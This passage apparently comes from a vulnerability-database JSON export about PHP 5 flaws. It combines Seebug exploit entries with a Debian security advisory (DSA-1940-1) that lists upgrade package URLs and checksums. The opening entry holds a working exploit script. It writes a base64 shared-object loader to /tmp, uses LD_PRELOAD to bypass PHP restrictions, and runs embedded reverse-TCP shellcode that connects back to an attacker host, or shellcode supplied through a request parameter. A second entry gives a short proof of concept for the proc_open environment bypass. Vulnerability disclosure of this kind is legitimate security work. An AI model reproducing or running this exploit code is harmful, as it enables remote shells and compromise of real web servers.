AAAQAAAASwEAAPAXAAAAAAAAEQDx\r\n/1QBAAAAAAAAAAAAACAAAABjAQAAVAYAAJ0AAAASAAgAagEAANQEAAAAAAAAEgAGAHABAAAAAAAA\r\nAAAAACAAAACIAQAAAAAAAAAAAAAQAAAAjQEAAOAYAAAAAAAAEADx/5kBAAAkBwAAAAAAABIACQCf\r\nAQAA4BgAAAAAAAAQAPH/pgEAAKQYAAAAAAAAEQDx/7wBAAD8GAAAAAAAABAA8f/BAQAAAAAAAAAA\r\nAAAQAAAAxgEAAAAAAAAAAAAAEAAAAMsBAAAAAAAAAAAAACAAAADfAQAAAAAAAAAAAAAgAAAAAC91\r\nc3Ivc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0aS5TADxjb21tYW5kIGxpbmU+ADxidWlsdC1pbj4A\r\nY3J0c3R1ZmYuYwBfX0NUT1JfTElTVF9fAF9fRFRPUl9MSVNUX18AX19FSF9GUkFNRV9CRUdJTl9f\r\nAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AG9iamVj\r\ndC4yAGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBf\r\nX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAL3Vzci9zcmMvbGliL2NzdS9pMzg2LWVs\r\nZi9jcnRuLlMAc2hlbGxjb2RlLmMAX19kc29faGFuZGxlAHVuc2V0ZW52AF9EWU5BTUlDAF9fY3hh\r\nX2ZpbmFsaXplAGdldHVpZABfaW5pdABfX2RlcmVnaXN0ZXJfZnJhbWVfaW5mbwByZWFkAF9fYnNz\r\nX3N0YXJ0AF9maW5pAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABleGl0AG9wZW4A\r\nX0p2X1JlZ2lzdGVyQ2xhc3NlcwBfX3JlZ2lzdGVyX2ZyYW1lX2luZm8A";\r\n}else{\r\n// default: linux\r\n// linux shellcode loader 
(x86)\r\n$shellcode_loader=\r\n"..." ;\r\n}\r\n \r\nif (!function_exists('file_put_contents')){\r\n function file_put_contents($filename, $data){\r\n $f = @fopen($filename, 'w');\r\n if (!$f){\r\n return false;\r\n }\r\n else{\r\n $bytes = fwrite($f, $data);\r\n fclose($f);\r\n return $bytes;\r\n }\r\n }\r\n}\r\n \r\n// Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'\r\nfile_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader));\r\n$ip = gethostbyname($host);\r\n \r\n$port1 = sprintf('%c', ($port>> 8)&255 );\r\n$port2 = sprintf('%c', ($port>> 0)&255 );\r\n \r\n$part = explode('.', $ip);\r\n//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);\r\n$STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);\r\n \r\n/*\r\n * linux/x86/shell_reverse_tcp - 71 
bytes\r\n * http://www.metasploit.com\r\n * Encoder: generic/none\r\n * LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5,\r\n * PrependSetresuid=false, PrependSetreuid=false,\r\n * PrependSetuid=false, PrependChrootBreak=false,\r\n * AppendExit=false\r\n */\r\n \r\n \r\n$Xshellcode =\r\n"\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80".\r\n"\\x5b\\x5e\\x68".$STRINGIP."\\x66\\x68".$port1.$port2."\\x66\\x53\\x6a\\x10".\r\n"\\x51\\x50\\x89\\xe1\\x43\\x6a\\x66\\x58\\xcd\\x80\\x59\\x87\\xd9\\xb0\\x3f".\r\n"\\xcd\\x80\\x49\\x79\\xf9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69".\r\n"\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x00" ;\r\n \r\nif(isset($_REQUEST['shellcode'])){\r\n// just for fans of metasploit\r\n$Xshellcode=base64_decode($_REQUEST['shellcode']);\r\n}\r\n \r\nfile_put_contents("/tmp/.X11-IHSTEAM", $Xshellcode);\r\n \r\n$cwd = '/tmp/';\r\n$env = array('LD_PRELOAD' => '/tmp/shellcode.so');\r\nunset($var);\r\n \r\n$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"));\r\n \r\n// BOOM\r\nproc_open('IHSteam', $descriptorspec, $var, $cwd, $env);\r\nmail("IHSteam","IHSteam","IHSteam","IHSteam");\r\n?>\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-19231"}, {"lastseen": "2017-11-19T18:28:18", "description": "BUGTRAQ ID: 37138\r\nCVE ID: CVE-2009-4018\r\n\r\nPHP is a widely used general-purpose scripting language that is especially suited to Web development and can be embedded in HTML. \r\n\r\nPHP passes the environment variables specified for proc_open without performing any checks, which ignores the safe_mode_allowed_env_vars and safe_mode_protected_env_vars settings. A user can bypass the safe_mode restrictions to access arbitrary files accessible to the Apache 
UID.\n\nPHP 5.3.x\nVendor patch:\r\n\r\nPHP\r\n---\r\nThe vendor has released an upgrade patch to fix this security issue; download it from the vendor home page:\r\n\r\nhttp://svn.php.net/viewvc/?view=revision&revision=286360", "published": "2009-11-30T00:00:00", "type": "seebug", "title": "PHP proc_open() safe_mode_protected_env_var restriction bypass vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4018"], "modified": "2009-11-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14994", "id": "SSV:14994", "sourceData": "\n <?\r\nputenv("BLAHBLAH=123");\r\nputenv("LD_LIBRARY_PATH=/no/way");\r\nputenv("PHP_TESTVAR=allowed");\r\n$env = array('BLAHBLAH' => '123', 'LD_LIBRARY_PATH' => '/no/way',\r\n'PHP_TESTVAR' => 'allowed');\r\n$dptspec = array(0 => array("pipe", "r"),\r\n 1 => array("pipe", "w"));\r\n$fp = proc_open('env', $dptspec, $pipes, './', $env);\r\necho "<pre>";\r\nwhile(!feof($pipes[1])) echo fgets($pipes[1], 1024);\r\nfclose($pipes[1]);\r\necho "</pre>";\r\n?>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-14994", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2020-11-11T13:12:28", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2687", "CVE-2009-3292", "CVE-2008-5658", "CVE-2009-3291", "CVE-2009-2626"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1940-1 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nNovember 25, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : php5\nVulnerability : multiple issues\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2009-2626 CVE-2009-2687 CVE-2009-3291 CVE-2009-3292\nDebian 
bugs : 535888 540605 527560 \n\nSeveral remote vulnerabilities have been discovered in the PHP 5\nhypertext preprocessor. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nThe following issues have been fixed in both the stable (lenny)\nand the oldstable (etch) distributions:\n \nCVE-2009-2687 CVE-2009-3292\n\n The exif module did not properly handle malformed JPEG files,\n allowing an attacker to cause a segfault, resulting in a denial\n of service.\n \n\nCVE-2009-3291\n\n The php_openssl_apply_verification_policy() function did not\n properly perform certificate validation.\n\n\nNo CVE id yet\n\n Bogdan Calin discovered that a remote attacker could cause a denial\n of service by uploading a large number of files using multipart/\n form-data requests, causing the creation of a large number of\n temporary files.\n\n To address this issue, the max_file_uploads option introduced in PHP\n 5.3.1 has been backported. This option limits the maximum number of\n files uploaded per request. The default value for this new option is\n 50. 
See NEWS.Debian for more information.\n\n\nThe following issue has been fixed in the stable (lenny) distribution:\n \nCVE-2009-2626\n\n A flaw in the ini_restore() function could lead to a memory\n disclosure, possibly leading to the disclosure of sensitive data.\n\n\nIn the oldstable (etch) distribution, this update also fixes a regression\nintroduced by the fix for CVE-2008-5658 in DSA-1789-1 (bug #527560).\n\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 5.2.6.dfsg.1-1+lenny4.\n\nThe oldstable distribution (etch), these problems have been fixed in\nversion 5.2.0+dfsg-8+etch16.\n\nFor the testing distribution (squeeze) and the unstable distribution\n(sid), these problems will be fixed in version 5.2.11.dfsg.1-2.\n\nWe recommend that you upgrade your php5 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 (oldstable) alias etch\n- -------------------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\n
checksum: 19590 9059b304df9bab6839a8e20d6071d706\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 224758 e72f41be256c4a9a088ab186782e69d3\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 38274 909e3a3e96acaef143477617539c102f\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 40966 f5a79ab2588446d4441e2310832bef25\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 21124 bbd739683199d65c24e60bcf28ffd15c\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 2636816 73c8b75aaacb6b6b04288d04a40320d5\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 20322 bbd9be70bfbbde086c94de1d48b721ff\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 24456 cf35fd3486528755a489d919f5282b67\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 50688 c998895656808d474defb1092f6dfb13\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 34084 dcbb9738d1c5a4a9acff1d70347a9c91\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 16466 7f385824b87318dcd35a23403a3a2500\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 34452 fe3c3515e024463f4e896873b79a4bc8\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 2339286 72b234c3640a6df2aad10c69a0f8dfe4\n 
http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 346104 3df62142ddcbcc49e15a19de9b879d63\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 11290 497cdb7245cff2b1066fde84179ff2fb\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 4613124 8e8d3b7def6574fe720e79ef98ab6fb3\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 64858 4e5c2a00ee49040841b3646c119438c9\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 12246 fb358b972aecb710bca7b2a2cb631445\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 33524 875c9a5c173b088710bb2c56963093bf\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 44374 07a7d24fe9310d7bd263cd4d44f43059\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 2339884 5643ab1279e6412aca57bee3f30a3c70\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 4762 a533020de317f5fd4b314c52dfbed2f4\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 5038 b1cf04e50a8377be0e303b46a63f54ea\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 12816 02d756a05b3f14f1fde896d6d824633d\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 216260 ef7c751d89f5eaedcb53037b2fe12705\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 36448 
880d6ac9a57f777d474a2e0473c6ca8d\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 18388 ea5ff2538f81ecf98b4cec6e94d94698\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 8618 3078e90c875e6ed3f5baf1423e259b69\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 17230 e426661709b814cfd860f920f6994792\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 2325162 61c4b2b50e07c2a39276945f79bd4b9f\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 34542 bd0d1be2d82bbd7834212fa305edc61f\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 6259582 3d5375c501a26ad6ea4dea0448c00af9\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 3198244 f77bd7b0b646f31738c78819be8922af\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 50650 16f80c37b82b26497e15a2b32522284e\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 236650 8165e88c029aa383c2de8e93c82392c6\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 15436 37b2eb669995db49e672cd23a8e5d843\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 342166 61a661798785c7ae7bb2c11aea8c1a9d\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 76618 9cb83c4bc231bade7184e0ee70486968\n 
http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 12012 4bf71b184f6e1c705690baa4cdbde35e\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 6502 3667f95d6ad22016857553df793fe272\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 3199296 1c72d0431f744e4c3c5f48772274b0c1\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 95634 dfdc9e95298840bc92f651c95adecf27\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 24866 a434bf6a52ad51913f2f12134c627ac7\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 25088 9cfb6b47f74723dfd90db2439ef30b2e\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 27146 da115f332ad5629536ea3048f9d9c6cc\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 34408 5dc989369358752ae96d6aa0091886e5\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 54518 c63fa927d47be4ac27a090efc90245fd\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 48404 761b87efe93f3436127f585c7967e5e3\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 3151862 23ebf641671d07e52fe39a9ce95386ba\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 6150 83e8d323f342ee99bcbe7ef152671c78\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 54674 
f3ab55e33d7b2b11ebd902fd5c051faa\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 17770 ba86313dd68a72319ad8a68dd0a8a6b5\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 17554 e12e126bb529e29d9b10b374db9de59c\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 50242 e5767c446ae9a72b46a678f89f4a8a26\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 5250 2adcdd4cf4b9ad0ab5505455c0669c0e\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 4908 7b0e17a304d90cbc8d8fae662ef92b20\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 35600 f061d038844877e045431adfc1217402\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 17316 24657b31ff82a1a27151395b28b432d5\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 31610 2deca61c78a278b2bbe9b9baeb039fa5\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 12222 4586d11c610f15bc88f7bc1e0bbec344\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 11350 05005a3f93ab1737bbd752432381fd39\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 2414744 fe305917ab4c5157bff749de8d643f93\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 2388420 d1f897a8b8bd63924a01a7de1777aba6\n 
http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 63876 a71f64d866732b19a2b2ec79e44f8fbd\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 15732 c7772b1c4e7aebf0ca832feaba178377\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 8280 47dce2b991a5658b06126386050db44b\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 33182 ae8f2414e988be684bc30dc10695a9f6\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 4736866 5c06712f122aa5f8a4b6992033a44ba6\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 2414240 8a0d0eeb3ecfa24b9bd40033862eee7f\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 32766 16b20c8fcc252883b4dc35d2ff284e55\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 12470 57b8c232fbc6deff7319607fe81487c6\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 18504 c37b2ffc3de93308d180a99e7b992a85\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 23356 2bbfb3c09797542afa52df7f6add0163\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 49508 2aad97731fe8768344d22e81299bb2db\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 35260 8997d142d3e05a91cfb7bbd91eb4792f\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 345428 
93df600fdcdc87ba609c6a8da5ddd9b2\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 218086 d151a6431b9673cd261d2466e28ec683\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 33096 bac9fcdde64fa312553a981edcf4bc25\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 8206 4f173f5c397825c2f013e6767213de59\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 4688168 466cb837e25d88ebcb9e1f39b96c7a9f\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 17256 fa6c6d2b04723abd97ca07b6492b6faf\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 31556 dbcf00dcfe9ced18c7ba1c376d5d48cf\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 32300 179ad76c714800b3ed25a42d3571fb50\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 2370122 3841febdc489245d3e98816961df6c81\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 4900 fd5d441737f2993ab9ceff107303094f\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 12140 bf2ef1cdb56906f6e944f5ccb8d9d7ca\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 342238 e4453c6faba3421f48975a0f28b038fe\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 2361064 fae1aa64a85c1dd03a0f89cd37f38af8\n 
http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 23368 7410b76ed8935732fa513f52eeeadd18\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 35566 607f39063ac660f277e63929b973d2c0\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 18462 5df5661ab217cb34260d76cb95571cad\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 5234 efdf40378e9adfda2716820e66b28532\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 12430 99938c3c2b69d8544ef3597f4adfb21f\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 2369670 40b4242baf2106b18442b52d10277958\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 49446 123a361ca889ba182de99d715b40dfb5\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 11260 4786eb4877b948ea47ced84ab597c2b4\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 15648 380b6ecaf3adda197254e6076777faec\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 63420 01cde33df9dd5aa1dbb4d2860a2d552d\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 34960 032bf522e8f4d650a9028b9ea5da0df6\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 217366 0dbb1962a33193dadebfdbd411c92c16\n\npowerpc architecture (PowerPC)\n\n 
http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 6744 67259178bf49b2173acd17bee2b0cf0c\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 36002 ed7c290dab79a3d964f64a6dedfc602e\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 4752474 465a9ad1238796ae9fd6d336c1a42b22\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 2443108 c2526968e31ac17e254d0210dd022926\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 342292 6c73de3ca4c191544862aaa3771a37e3\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 37714 88c4d9f2faa2062b69e52a1c8553e005\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 220284 459907137ffb3be31443ed5abc3197bd\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 36480 a055a7d0507090b08be4ea25bb162feb\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 2393974 3c3ba2168e23ec8731397c2031c618e4\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 13756 477f4b7219c2a93fddd27b530058e050\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 18464 712dee6c962985ed08d4202a62c68886\n 